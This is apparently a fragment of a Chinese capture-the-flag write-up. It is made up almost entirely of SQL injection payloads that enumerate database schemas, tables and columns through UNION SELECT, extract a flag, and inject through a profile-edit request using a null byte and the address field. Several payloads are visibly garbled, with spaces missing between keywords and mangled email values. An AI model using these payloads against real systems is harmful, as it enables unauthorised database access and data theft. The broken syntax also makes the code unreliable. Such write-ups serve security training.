' union select * from (selectdatabase()) from information_schema.tables ) a join (selectversion() ) b %23
1
' union select * from (selectgroup_concat(distinct(table_schema)) from information_schema.tables ) a join (selectversion() ) b %23
1
' union select * from (selectgroup_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (selectversion() ) b %23
1
' union select * from (selectgroup_concat(distinct(column_name)) from information_schema.columns where table_name='users') a join (selectversion() ) b %23
1
' union select * from (select flag_9c861b688330 fromusers) a join (selectversion() ) b %23
http://246ec0b9b99b49e0b389942159f82cedd0c28f2815984231.game.ichunqiu.com/member/userinfo.php?job=edit&step=2 truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select version()) where uid=3%23
然后我们刷新一下个人主页,确实是有版本号回显的
好了,找到注入点就能进行注入了
1
truename=xxxx%0000&Limitword[000]=&email[email protected]&provinceid=,address=(select group_concat(distinct(table_schema)) from information_schema.tables) where uid=3 %23
1
truename=xxxx%0000&Limitword[000]=&email[email protected]&provinceid=,address=(select group_concat(distinct(table_name)) from information_schema.tables where table_schema=database()) where uid=3 %23
1
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=,address=(selectgroup_concat(distinct(column_name)) from information_schema.columns where table_name = (selectdistinct(table_name) from information_schema.tables where table_schema = database() limit1) ) where uid = 3 %23
评论